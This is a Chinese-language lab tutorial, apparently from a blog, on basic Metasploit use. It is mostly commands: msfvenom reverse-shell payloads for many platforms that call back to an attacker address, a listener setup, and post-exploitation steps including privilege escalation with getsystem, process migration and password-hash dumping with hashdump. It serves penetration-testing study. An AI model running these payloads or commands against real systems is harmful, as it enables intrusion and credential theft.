编程语言
首页 > 编程语言> > metasploit之基础命令操作

metasploit之基础命令操作

作者:互联网

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

metasploit基础命令操作

建立数据库:

msfdb init #对msf数据库进行初始化
service postgresql start #开启postgresql数据库
service postgresql status #查看状态

当我们需要使用msf进行一些扫描且需要记住扫描结果,需开启此数据库。
在这里插入图片描述

生成payload:

在msf上可以使用命令生成可执行文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe  > msf.exe #反向reverse 正向bind

同样也是有php、asp、jsp、linux、war、python等等

#Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
#Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
#Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
#PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
#ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
#JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
#WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war 
#python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
#Bash: 
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f raw > shell.sh
#Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl 

这里比较常用的就是windows,如果不加x64,默认是x86
生成可执行程序:其中-p就是payload。-f就是执行程序的类型,-o就是将全面的代码生成指定的文件名,同样>也是可以相同的作用。
在这里插入图片描述

建立监听:

开启监听,获取权限,权限查看:

set payload windows/x64/meterpreter/reverse_tcp #添加payload攻击载荷,这里根据生成可执行文件中的payload
set LHOST 10.10.10.128 #添加攻击机地址
show options #查看添加情况
set LPORT #添加攻击机端口 默认是4444,这根据你生成可执行文件中的端口来定
set RHOST #被攻击方地址 一般在正向连接中需要添加。
exploit && run #这两个命令都在可以执行上面的监听效果。

在这里插入图片描述

成功反弹:

但文件在被攻击方中运行后,会生成一个shell的session,此shell就是通过反向的方式让我们被攻击方来连接我们。
常用命令:

getuid #查看当前权限
getsystem #提权权限至system
background #将session保存至后台
sessions #查看当前会话。

在这里插入图片描述

进程迁移:

hashdump #导出hash
ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。
migrate PID号 #迁移进程

在这里插入图片描述
当我们进行进程迁移后,就可以看出已将administrator权限提升至system权限。当我们有的时候不能够执行hashdump时,则需要迁移进程后再使用。
在这里插入图片描述

退回初始权限:

当进行权限提升后,同样可以使用命令退回之前的权限:

rev2self #退回至当前权限

在这里插入图片描述
当我们连接了数据库时,在msf中便会记录我们一些重要数据,当我们进行信息收集时,便于我们查看:
这里可以看出使用db_xxx便可以调用一些命令。
在这里插入图片描述

查看历史数据:

services #查看信息收集或执行命令后,留存的有用数据。
services -d 10.10.10.158 #删除数据。
db_nmap #调用nmap来进行内部扫描。

在这里插入图片描述

断开session:

同样可以关掉这条session :

sessions -k id号 #关闭session

在这里插入图片描述

标签:metasploit,shell,reverse,LHOST,tcp,LPORT,命令,msfvenom,操作
来源: https://blog.csdn.net/nicai321/article/details/122745903